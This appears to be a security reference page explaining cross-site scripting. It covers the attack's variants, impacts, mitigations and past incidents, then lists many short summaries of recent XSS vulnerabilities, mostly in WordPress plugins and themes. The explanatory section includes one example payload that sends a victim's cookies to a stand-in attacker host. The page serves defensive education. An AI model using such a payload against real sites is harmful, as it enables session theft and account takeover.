Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38830)
IBM InfoSphere Information Server versions 11.7.0.0 through 11.7.1.6 contain a stored or reflected cross-site scripting (XSS) vulnerability in the Web UI that allows authenticated users to inject arbitrary JavaScript code. An attacker with valid credentials can exploit this vulnerability to alter application functionality and potentially steal session credentials or perform actions on behalf of other users within a trusted browser session. A patch is available from IBM, and the vulnerability has a CVSS score of 5.4 with moderate real-world risk due to the requirement for prior authentication and user interaction.
IBM InfoSphere Information Server versions 11.7.0.0 through 11.7.1.6 contain a stored or reflected cross-site scripting (XSS) vulnerability in the Web UI that allows authenticated users to inject arbitrary JavaScript code. An attacker with valid credentials can exploit this vulnerability to steal session tokens, capture credentials entered by other users, or perform actions on behalf of compromised administrators within a trusted session, potentially leading to unauthorized access to sensitive data integration and metadata management systems.
IBM Infosphere Information Server versions 11.7.0.0 through 11.7.1.6 contain a stored cross-site scripting (XSS) vulnerability in the Web UI that allows privileged users to inject arbitrary JavaScript code, potentially leading to credential disclosure and session compromise. While a vendor patch is available, the attack requires high privileges and user interaction, resulting in a moderate CVSS score of 4.8. This vulnerability does not appear to have active exploitation in the wild or public proof-of-concept code, but should be prioritized for organizations running vulnerable versions in security-sensitive environments.
PrestaShop contains multiple stored Cross-Site Scripting (XSS) vulnerabilities in the back-office (BO) administration panel. An attacker with limited back-office access or who has exploited a separate vulnerability to inject data into the database can exploit unprotected template variables to execute arbitrary JavaScript in administrators' browsers. The CVSS score of 7.7 reflects high attack complexity and the requirement for high privileges, though no evidence of active exploitation (KEV) or public proof-of-concept is currently available.
A stored cross-site scripting (XSS) vulnerability in n8n workflow automation platform allows authenticated users to craft malicious workflows that execute arbitrary JavaScript in the browsers of higher-privileged users. Affected versions are n8n prior to 1.123.27, 2.13.3, and 2.14.1 (identified via CPE cpe:2.3:a:n8n-io:n8n). An attacker with workflow creation/modification permissions can exploit the `/rest/binary-data` endpoint's failure to properly sanitize HTML responses, enabling credential theft, workflow manipulation, and privilege escalation to administrative access with full same-origin context.
Domoticz versions prior to 2026.1 contain a stored cross-site scripting (XSS) vulnerability in the web interface's Add Hardware and device rename functionality that allows authenticated administrators to inject arbitrary JavaScript or HTML markup. The injected malicious code is stored persistently and executed in the browsers of any users viewing the affected pages, potentially enabling unauthorized session hijacking or malicious actions performed under the victim's privileges. A patch is available from the vendor, and while this requires administrator-level access to exploit, the persistent nature of the vulnerability and user interaction requirement represent moderate real-world risk within administrative environments.
This vulnerability is a stored cross-site scripting (XSS) flaw in GitLab's Mermaid diagram rendering that allows authenticated users to inject arbitrary JavaScript code into other users' browsers through improperly sanitized entity-encoded content. The vulnerability affects GitLab CE/EE versions 17.7 before 18.8.7, 18.9 before 18.9.3, and 18.10 before 18.10.1, with a CVSS score of 5.4 (medium severity). A public proof-of-concept exploit is available on HackerOne, indicating active awareness in the security community.
Improper HTML sanitization in GitLab EE versions 15.4-18.10.1 allows authenticated users to add email addresses to arbitrary user accounts, potentially enabling account takeover or unauthorized access escalation. Public exploit code exists for this vulnerability, and no patch is currently available. Affected deployments should implement access controls to restrict user modification privileges until updates become available.
Taboola Pixel versions up to and including 1.1.4 contain a Reflected Cross-Site Scripting (XSS) vulnerability that allows attackers to inject malicious scripts into web pages during generation. An attacker can craft a malicious URL containing JavaScript payload and trick users into clicking it, causing the injected code to execute in the victim's browser with their session privileges. This vulnerability affects the Taboola Pixel WordPress plugin and has been identified by Patchstack; no CVSS score or EPSS data is currently available, but the reflected XSS classification and WordPress plugin distribution suggest moderate to high real-world risk given the plugin's widespread usage.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the OOPSpam Anti-Spam WordPress plugin through version 1.2.62, allowing attackers to inject and persist malicious JavaScript code that executes in the browsers of authenticated users and administrators. The vulnerability stems from improper input neutralization during web page generation (CWE-79), enabling attackers to compromise user sessions, steal credentials, or perform actions on behalf of affected users. No CVSS score, EPSS probability, or active exploitation data (KEV status) are currently available, but the Stored XSS classification and WordPress plugin distribution indicate moderate to high real-world risk given the plugin's accessibility and widespread WordPress ecosystem deployment.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in ThemeFusion Fusion Builder, a WordPress page builder plugin, affecting all versions prior to 3.15.0. An unauthenticated attacker can inject malicious JavaScript into web pages through improper input sanitization, allowing them to steal session cookies, perform actions on behalf of users, or redirect visitors to malicious sites. No CVSS score, EPSS data, or public proof-of-concept have been officially published, but the vulnerability has been documented by Patchstack and assigned EUVD-2026-15919; patch availability is confirmed via the vendor advisory.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in Bookly, a WordPress appointment booking plugin, affecting versions up to and including 26.7. Attackers can inject malicious scripts into web requests that execute in the victim's browser when the vulnerable page is rendered, allowing session hijacking, credential theft, or malware distribution. While no CVSS score or EPSS data is currently available, the vulnerability has been formally tracked by ENISA (EUVD-2026-15915) and reported via Patchstack, indicating active awareness in the security community.
A Stored Cross-Site Scripting (XSS) vulnerability exists in ThemeHunk's Contact Form & Lead Form Elementor Builder plugin for WordPress, affecting all versions through 2.0.1. An attacker can inject malicious scripts into form fields that are stored in the database and executed in the browsers of administrators or other users who view the submitted data, potentially leading to account takeover, data theft, or malware distribution. No CVSS score or EPSS data is currently available, and active exploitation status is unknown; however, the vulnerability is confirmed by Patchstack and tracked under ENISA EUVD-2026-15903.
A reflected Cross-Site Scripting (XSS) vulnerability exists in the don-themes Molla WordPress theme through version 1.5.18, allowing attackers to inject malicious scripts into web pages viewed by victims. The vulnerability stems from improper neutralization of user input during web page generation (CWE-79), enabling attackers to execute arbitrary JavaScript in the context of affected users' browsers. An attacker can craft a malicious URL containing XSS payload and trick users into clicking it, potentially leading to session hijacking, credential theft, or malware distribution. No active exploitation in the wild has been confirmed via KEV status, and CVSS/EPSS scores are not available, but the vulnerability is documented by Patchstack with a confirmed patch available in version 1.5.19 or later.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in don-themes Riode WordPress theme versions prior to 1.6.29, allowing attackers to inject malicious JavaScript code that executes in users' browsers when they click on crafted links. This CWE-79 vulnerability affects the Riode multi-purpose WooCommerce theme and enables attackers to steal session cookies, perform actions on behalf of users, or redirect users to malicious sites. No CVSS score, EPSS data, or formal KEV status is currently available, but the vulnerability was reported by Patchstack with a confirmed patch available in version 1.6.29 and later.
A Stored Cross-Site Scripting (XSS) vulnerability exists in VillaTheme's Abandoned Cart Recovery for WooCommerce plugin affecting versions up to and including 1.1.10. The vulnerability allows attackers to inject malicious JavaScript code that persists in the application and executes in the browsers of administrators and customers when vulnerable pages are viewed. An attacker with appropriate access can compromise user sessions, steal sensitive data, or perform unauthorized actions on behalf of legitimate users.
A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the Northern Beaches Websites WP Custom Admin Interface WordPress plugin through version 7.42, allowing attackers to inject and execute arbitrary JavaScript code in users' browsers. This vulnerability affects all installations of the plugin up to and including version 7.42, enabling attackers to steal session cookies, perform unauthorized actions on behalf of authenticated administrators, or redirect users to malicious sites. While no CVSS score or EPSS probability has been published, the DOM-based XSS classification (CWE-79) combined with the plugin's administrative scope indicates a high-severity risk requiring immediate patching.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the imithemes Gaea WordPress theme affecting versions prior to 3.8, allowing attackers to inject malicious scripts into web pages viewed by other users. The vulnerability stems from improper neutralization of user input during web page generation (CWE-79), enabling attackers to steal session cookies, perform actions on behalf of users, or redirect visitors to malicious sites. No CVSS score or EPSS data is currently available, and active exploitation status via KEV has not been confirmed, but the XSS classification and public disclosure via Patchstack suggest this represents a moderate to significant risk for WordPress installations using affected Gaea theme versions.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in Kleor Contact Manager through version 9.1, allowing attackers to inject malicious scripts into web pages viewed by users. The vulnerability affects the Contact Manager plugin and can be exploited via reflected XSS attacks where user input is improperly neutralized during web page generation. An attacker can craft a malicious URL containing JavaScript payloads that execute in the victim's browser, potentially leading to session hijacking, credential theft, or malware distribution. No CVSS score, EPSS data, or active KEV status is currently available; however, the confirmed presence of the vulnerability through Patchstack indicates a legitimate security concern requiring immediate attention.
A Cross-site Scripting (XSS) vulnerability exists in the Ays Pro Image Slider WordPress plugin (versions up to and including 2.7.1) due to improper input neutralization during web page generation, combined with incorrectly configured access control security levels. Attackers can inject malicious scripts that execute in the context of other users' browsers, potentially stealing session tokens, redirecting users, or performing unauthorized actions on behalf of victims. No CVSS score, EPSS data, or active exploitation signals (KEV status) are currently available, but the vulnerability is confirmed by Patchstack and assigned EUVD-2026-15837.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the eyecix JobSearch WordPress plugin through version 3.2.0, allowing attackers to inject malicious scripts into web pages viewed by users. The vulnerability affects all installations of the JobSearch plugin up to and including version 3.2.0, enabling attackers to steal session cookies, perform unauthorized actions on behalf of users, or redirect users to malicious sites. No active exploitation in the wild has been publicly confirmed, though the vulnerability is documented in Patchstack's vulnerability database.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the WP Review Slider plugin (also known as wp-facebook-reviews) versions 13.9 and earlier, allowing attackers to inject malicious scripts that persist in the application and execute in users' browsers. This vulnerability affects WordPress site administrators and users who interact with review content. An attacker can exploit this to steal session tokens, deface content, redirect users to malicious sites, or perform actions on behalf of compromised users.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the WP TripAdvisor Review Slider WordPress plugin through version 14.1, allowing attackers to inject malicious scripts that persist in the database and execute in the browsers of site visitors. The vulnerability affects all versions up to and including 14.1, and an attacker with sufficient privileges to inject content can compromise user sessions, steal credentials, or perform arbitrary actions on behalf of site administrators. No CVSS score or EPSS data is currently available, and active exploitation status via KEV is unknown, but Patchstack has documented this as a confirmed vulnerability with a reference implementation.
A DOM-Based Cross-Site Scripting (XSS) vulnerability exists in the hookandhook WP Courses LMS WordPress plugin through version 3.2.26, allowing attackers to inject malicious scripts that execute in users' browsers. The vulnerability affects all installations of WP Courses LMS up to and including version 3.2.26, enabling attackers to steal session tokens, redirect users, or perform actions on behalf of authenticated users. No CVSS score, EPSS data, or active KEV/POC information is currently available in public sources, though the vulnerability has been documented by Patchstack and assigned EUVD ID EUVD-2026-15815.
A reflected cross-site scripting (XSS) vulnerability exists in G5Theme's Darna Framework through version 2.9, allowing attackers to inject malicious scripts that execute in users' browsers when crafted URLs are visited. The vulnerability affects the Darna Framework WordPress plugin and stems from improper input neutralization during web page generation. While no CVSS score or EPSS data is currently published, the CWE-79 classification indicates this is a classic reflected XSS with potential for credential theft, session hijacking, and malware distribution depending on the attack vector's accessibility.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in G5Theme's Wolverine Framework through version 1.9, enabling attackers to inject malicious scripts into web pages generated by the framework. This vulnerability affects all installations of Wolverine Framework up to and including version 1.9, allowing attackers to execute arbitrary JavaScript in the context of victim browsers when they visit a maliciously crafted URL. While no CVSS score or EPSS data is currently available, the vulnerability has been reported by Patchstack and assigned ENISA EUVD ID EUVD-2026-15797, indicating it has undergone standardized review.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in PenciDesign's Penci Soledad Data Migrator plugin through version 1.3.1, allowing attackers to inject malicious scripts that execute in users' browsers when they visit a crafted URL. The vulnerability affects all versions up to and including 1.3.1 of the WordPress plugin. An attacker can exploit this to steal session cookies, perform actions on behalf of authenticated users, or redirect users to malicious sites, with the attack requiring only that a victim click a malicious link-no special privileges or interaction with the application itself required.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the CodePeople CP Multi View Event Calendar WordPress plugin through version 1.4.35, allowing authenticated or unauthenticated attackers to inject malicious JavaScript that persists in the database and executes in the browsers of site visitors. This CWE-79 vulnerability enables attackers to steal session cookies, redirect users to malicious sites, or perform actions on behalf of administrators. While no CVSS score or EPSS data are currently published and the vulnerability has not been designated as actively exploited in CISA's KEV catalog, the nature of stored XSS combined with the plugin's event calendar functionality-which typically accepts user input for event creation and editing-indicates a credible attack surface.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the purethemes Listeo Core WordPress plugin through version 2.0.21, allowing attackers to inject malicious scripts into web pages viewed by victims. An attacker can craft a malicious URL containing JavaScript payload that executes in the victim's browser when they visit the link, potentially stealing session cookies, credentials, or performing actions on behalf of the user. No CVSS score, EPSS data, or active KEV status is currently published, but the vulnerability is documented by Patchstack with a direct reference to the affected plugin version.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the WPDO Remoji WordPress plugin through version 2.2, allowing attackers to inject malicious JavaScript code that persists in the database and executes in the browsers of site visitors. This vulnerability affects all installations of Remoji up to and including version 2.2, enabling authenticated or unauthenticated attackers (depending on plugin configuration) to compromise website visitors' sessions, steal credentials, or redirect users to malicious sites. While CVSS and EPSS scores are not publicly available, the vulnerability's classification as Stored XSS and reporting through Patchstack indicate moderate-to-high real-world severity.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the wpdevart Booking Calendar and Appointment Booking System WordPress plugin through version 3.2.36, allowing attackers to inject and execute malicious JavaScript code that persists in the application database. An authenticated or unauthenticated attacker can exploit this vulnerability to steal session cookies, perform actions on behalf of legitimate users, or redirect visitors to malicious sites. No CVSS score, EPSS probability, or active exploitation in the wild (KEV status) are currently available, but the vulnerability affects a widely-used booking plugin and likely represents a significant risk given the prevalence of WordPress installations.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Metagauss ProfileGrid WordPress plugin through version 5.9.8.1, allowing attackers to inject malicious scripts that persist in the database and execute in the browsers of other users. The vulnerability affects all versions of ProfileGrid up to and including 5.9.8.1, enabling attackers with appropriate access to compromise user sessions, steal credentials, or perform actions on behalf of victims. While no CVSS score or EPSS data is currently available, the Stored XSS classification (CWE-79) combined with active reporting from security researchers indicates this is a legitimate and actionable threat.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in Iqonic Design's KiviCare clinic management system through version 3.6.16, allowing attackers to inject malicious scripts into web pages viewed by users. An attacker can craft a malicious URL containing JavaScript payload and trick users into clicking it, enabling session hijacking, credential theft, or unauthorized actions within the clinic management system. No CVSS score, EPSS probability, or KEV status are available, though the vulnerability was publicly disclosed by Patchstack and is categorized under CWE-79 (Improper Neutralization of Input During Web Page Generation).
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the eyecix Addon Jobsearch Chat plugin for WordPress, affecting versions up to and including 3.0. An attacker can inject malicious scripts into user-controlled input that is reflected back in the web page without proper sanitization, allowing them to steal session cookies, perform actions on behalf of authenticated users, or redirect users to malicious sites. No CVSS score, EPSS probability, or active KEV designation is available; however, the vulnerability is confirmed via Patchstack and carries a European vulnerability database entry (EUVD-2026-15694).
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the ProgressionStudios Vayvo WordPress theme (versions prior to 6.8) that allows attackers to inject malicious scripts into web pages viewed by users. An attacker can craft a malicious URL containing unsanitized input and trick users into clicking it, causing arbitrary JavaScript to execute in the victim's browser within the context of the Vayvo-powered site. No CVSS score, EPSS probability, or KEV confirmation is currently available, but the reflected XSS classification and Patchstack reporting indicate this is a known, credible vulnerability with patch availability.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the WpEvently WordPress plugin (mage-eventpress) affecting versions up to and including 5.1.4, allowing attackers to inject malicious scripts that execute in users' browsers when they visit crafted URLs. The vulnerability stems from improper neutralization of user input during web page generation (CWE-79), enabling attackers to steal session cookies, perform unauthorized actions, or redirect users to malicious sites. No CVSS score or EPSS data is currently available, but the Patchstack reporting and EUVD tracking indicate this is a documented and confirmed vulnerability requiring prompt patching.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the Skygroup Yobazar WordPress theme due to improper neutralization of user input during web page generation. This vulnerability affects Yobazar versions prior to 1.6.7 and allows attackers to inject malicious scripts that execute in the browsers of users who visit crafted URLs. The vulnerability has been reported by Patchstack and is classified as CWE-79; while no CVSS score or EPSS data is currently available, the reflected XSS vector typically enables session hijacking, credential theft, and malware distribution.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Sanzo theme by skygroup, allowing authenticated or unauthenticated attackers to inject malicious scripts that are permanently stored and executed in the context of other users' browsers. This vulnerability affects Sanzo versions prior to 2.4.3 and has been documented by Patchstack as a high-risk input validation failure. Attackers can leverage this to steal session cookies, perform actions on behalf of users, or redirect victims to malicious sites.
A reflected Cross-Site Scripting (XSS) vulnerability exists in the skygroup Reebox WordPress theme due to improper neutralization of user input during web page generation. This vulnerability affects Reebox versions prior to 1.4.8, allowing attackers to inject malicious scripts that execute in the context of a victim's browser when they click a crafted link. While CVSS and EPSS scores are not publicly available, the CWE-79 classification and Patchstack reporting indicate this is a confirmed, real vulnerability with active disclosure through the EUVD database (EUVD-2026-15671).
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the skygroup Nooni theme affecting versions prior to 1.5.1, allowing attackers to inject malicious scripts into web pages viewed by users. The vulnerability stems from improper neutralization of user input during web page generation, classified as CWE-79. Attackers can craft malicious URLs containing JavaScript payloads that execute in the context of a victim's browser when the link is visited, potentially leading to session hijacking, credential theft, or malware distribution.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the skygroup MyDecor WordPress theme affecting versions prior to 1.5.9. An unauthenticated attacker can inject malicious JavaScript code through unvalidated user input parameters in web requests, which is then reflected back to victims in the HTTP response without proper sanitization or encoding. This allows attackers to execute arbitrary JavaScript in a victim's browser within the context of the affected website, potentially leading to session hijacking, credential theft, or malware distribution.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the skygroup MyMedi WordPress theme that allows unauthenticated attackers to inject malicious scripts into web pages viewed by other users. The vulnerability affects MyMedi versions prior to 1.7.7, and an attacker can leverage reflected XSS to steal session cookies, redirect users to malicious sites, or perform actions on behalf of the victim. No active exploitation in the wild has been confirmed, but the vulnerability was publicly disclosed via Patchstack with technical details available.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the skygroup Miti theme for WordPress, allowing attackers to inject malicious scripts into web pages viewed by users. This vulnerability affects Miti versions prior to 1.5.3, and an attacker can craft malicious URLs to execute arbitrary JavaScript in the context of a victim's browser session, potentially stealing credentials, session tokens, or performing actions on behalf of the user. No CVSS score, EPSS metric, or KEV status information is currently available, but the vulnerability has been documented by Patchstack with a patch available in version 1.5.3.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the skygroup Loobek theme (CWE-79: Improper Neutralization of Input During Web Page Generation) that allows attackers to inject malicious scripts into web pages viewed by users. The vulnerability affects Loobek versions prior to 1.5.2, as documented by Patchstack and tracked under ENISA EUVD ID EUVD-2026-15664. An attacker can craft a malicious URL containing unescaped input that, when clicked by a victim, executes arbitrary JavaScript in the victim's browser context, potentially leading to session hijacking, credential theft, or malware distribution.
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Acato WP REST Cache WordPress plugin through version 2026.1.0, allowing attackers to inject and persist malicious JavaScript code that executes in the browsers of site administrators and users. This vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and affects all installations of WP REST Cache up to and including version 2026.1.0. An attacker with appropriate access could inject stored XSS payloads that compromise administrator sessions, steal credentials, or modify site content.
A Cross-Site Scripting (XSS) vulnerability exists in AYS Pro FAQ Builder plugin versions up to and including 1.8.2, allowing attackers to inject malicious scripts through improperly neutralized input during web page generation. The vulnerability stems from incorrectly configured access control security levels, enabling unauthenticated or low-privileged attackers to execute arbitrary JavaScript in the context of affected WordPress sites. While CVSS and EPSS scores are not publicly available, the vulnerability was reported by Patchstack and assigned ENISA EUVD ID EUVD-2026-15661, indicating formal recognition across European vulnerability databases.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the kutethemes Boutique WordPress theme versions prior to 2.4.6, allowing attackers to inject malicious scripts into web pages viewed by other users. An attacker can craft a malicious URL containing unsanitized input that, when clicked by a victim, executes arbitrary JavaScript in the victim's browser within the context of the affected website. This vulnerability enables session hijacking, credential theft, malware distribution, and defacement of affected e-commerce sites running vulnerable versions of the Boutique theme.
RSFirewall!, a security plugin for Joomla, contains a Stored Cross-Site Scripting (XSS) vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users. The vulnerability affects RSFirewall! versions up to and including 1.1.45, enabling authenticated or unauthenticated attackers (depending on configuration) to store persistent XSS payloads that execute in the browsers of administrators and site visitors. No CVSS score, EPSS data, or KEV status is currently available, but the Patchstack report indicates active awareness of this vulnerability in the security community.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the 8theme XStore Core WordPress plugin (et-core-plugin) that allows attackers to inject malicious scripts into web pages viewed by victims. The vulnerability affects XStore Core versions up to and including 5.6.4, enabling reflected XSS attacks where unsanitized user input is echoed back in HTTP responses without proper neutralization. An attacker can craft malicious URLs containing JavaScript payloads that execute in a victim's browser when clicked, potentially stealing session tokens, credentials, or performing actions on behalf of the user.
A reflected Cross-site Scripting (XSS) vulnerability exists in the Skygroup Jaroti WordPress theme through version 1.4.7, allowing attackers to inject malicious scripts into web pages viewed by users. The vulnerability stems from improper neutralization of user input during web page generation (CWE-79), enabling attackers to execute arbitrary JavaScript in the context of victim browsers. Affected users should upgrade to Jaroti version 1.4.8 or later to remediate the vulnerability; no CVSS score or EPSS data is currently available, and no KEV or POC confirmation has been documented in accessible threat intelligence sources.
A reflected cross-site scripting (XSS) vulnerability exists in the uixthemes Motta Addons WordPress plugin through version 1.6.0, allowing attackers to inject malicious JavaScript into web pages viewed by other users. The vulnerability affects all versions of Motta Addons prior to 1.6.1 and is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). While no CVSS score, EPSS score, or KEV status is currently available, this is a confirmed vulnerability reported by Patchstack with a clear patch version available, making it a practical security concern for WordPress site administrators using affected versions.
VikRestaurants plugin versions up to and including 1.5.2 contain a Reflected Cross-Site Scripting (XSS) vulnerability that allows attackers to inject malicious JavaScript code into web pages viewed by users. The vulnerability affects the e4jvikwp VikRestaurants product, a restaurant management and booking plugin primarily used in WordPress environments. An attacker can craft a malicious URL containing JavaScript payload and trick users into clicking it, resulting in credential theft, session hijacking, or defacement of the restaurant website.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the stmcan NaturaLife Extensions WordPress plugin through version 2.1, allowing attackers to inject malicious scripts that execute in users' browsers when they visit crafted URLs. The vulnerability stems from improper input neutralization during web page generation (CWE-79), enabling attackers to steal session cookies, perform actions on behalf of users, or redirect users to malicious sites. No CVSS score, EPSS data, or KEV status have been published for this CVE, but the Patchstack report indicates active awareness in the security community.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the WHMCSdes Phox Hosting plugin (versions up to and including 2.0.8) that allows attackers to inject malicious scripts into web pages viewed by other users. The vulnerability stems from improper neutralization of user input during web page generation (CWE-79), enabling attackers to execute arbitrary JavaScript in the context of a victim's browser session. While no CVSS score, EPSS probability, or active KEV status was provided in available intelligence, the reflected XSS classification indicates moderate-to-high real-world risk depending on deployment context and user interaction requirements.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in UpSolution Core plugin versions through 8.41, allowing attackers to inject malicious scripts into web pages viewed by other users. The vulnerability affects the UpSolution Core WordPress plugin (CPE: cpe:2.3:a:upsolution:upsolution_core), enabling attackers to steal session tokens, perform actions on behalf of users, or redirect users to malicious sites through crafted URLs. No CVSS score, EPSS probability, or KEV status is currently available, though Patchstack has confirmed and documented this as a reflected XSS vulnerability.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in NooTheme Visionary Core WordPress plugin through version 1.4.9, allowing attackers to inject malicious scripts that execute in users' browsers when they visit crafted URLs. This vulnerability, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), affects all installations of the plugin up to and including version 1.4.9. An attacker can craft a malicious link to steal session cookies, perform unauthorized actions on behalf of logged-in users, or redirect users to phishing sites, with the attack vector being network-based and requiring no authentication.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in NooTheme Jobica Core plugin through version 1.4.1, allowing attackers to inject malicious scripts into web pages viewed by users. This vulnerability affects the WordPress plugin ecosystem and could enable attackers to steal session cookies, redirect users to phishing sites, or perform actions on behalf of authenticated users. No CVSS score or EPSS data is currently available, and the vulnerability has not been formally added to the CISA Known Exploited Vulnerabilities (KEV) catalog, though active exploitation potential exists given the Reflected XSS attack vector's simplicity.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in NooTheme's Organici Library plugin for WordPress, affecting versions up to and including 2.1.2. The vulnerability allows unauthenticated attackers to inject malicious scripts into web pages viewed by other users through crafted URLs or form inputs, potentially stealing session cookies, credentials, or performing actions on behalf of victims. While no CVSS score or EPSS data is publicly available, the reflected XSS classification (CWE-79) combined with the lack of apparent access restrictions suggests moderate to high real-world risk, particularly in WordPress environments where plugin vulnerabilities are frequently exploited.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in NooTheme CitiLights WordPress theme versions up to and including 3.7.1, allowing attackers to inject malicious scripts into web pages viewed by other users. The vulnerability stems from improper neutralization of user input during web page generation (CWE-79), enabling attackers to execute arbitrary JavaScript in victims' browsers. An attacker can craft malicious URLs containing JavaScript payloads and trick users into clicking them, potentially leading to session hijacking, credential theft, or malware distribution.
A reflected Cross-Site Scripting (XSS) vulnerability exists in ThemeMakers Car Dealer WordPress theme affecting versions up to and including 1.6.7. The vulnerability allows attackers to inject malicious scripts that execute in the browsers of users who click specially crafted links, potentially leading to session hijacking, credential theft, or malware distribution. No CVSS score, EPSS data, or KEV status is currently available, and the vulnerability has not been reported as actively exploited in public threat intelligence.
A Stored Cross-Site Scripting (XSS) vulnerability exists in Theme-one's The Grid WordPress plugin versions prior to 2.8.0, allowing attackers to inject and persist malicious scripts that execute in the browsers of other users viewing affected pages. An authenticated or unauthenticated attacker can exploit improper input neutralization during web page generation to inject arbitrary JavaScript code. While no CVSS score, EPSS probability, or KEV status has been assigned, the vulnerability is confirmed by Patchstack and carries significant risk given the stored nature of the XSS and the plugin's widespread WordPress ecosystem adoption.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in Softwebmedia Gyan Elements WordPress plugin through version 2.2.1, allowing attackers to inject malicious scripts that execute in users' browsers when they visit crafted URLs. This vulnerability affects all versions up to and including 2.2.1, enabling attackers to steal session tokens, perform unauthorized actions, or harvest sensitive user data. While no CVSS score or EPSS data is currently published, the nature of reflected XSS combined with WordPress plugin distribution suggests moderate-to-high real-world exploitation potential, particularly if users remain on vulnerable versions.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the uxper Golo theme that allows attackers to inject malicious scripts into web pages viewed by users. The vulnerability affects Golo versions prior to 1.7.5 and can be exploited by crafting malicious URLs that execute arbitrary JavaScript in the context of a victim's browser. An attacker can steal session cookies, perform actions on behalf of the user, or redirect users to malicious sites without requiring authentication or special privileges.
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the WP Telegram Widget and Join Link WordPress plugin (versions up to 2.2.13) that allows attackers to inject malicious JavaScript code into web pages viewed by other users. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation) and affects all installations of this plugin running the vulnerable versions. An attacker can craft a malicious URL containing JavaScript payloads that, when clicked by a victim, executes arbitrary code in the victim's browser within the context of the WordPress site, potentially leading to session hijacking, credential theft, or malware distribution. No CVSS score, EPSS data, or KEV status has been published, but Patchstack has documented this vulnerability with a public reference.
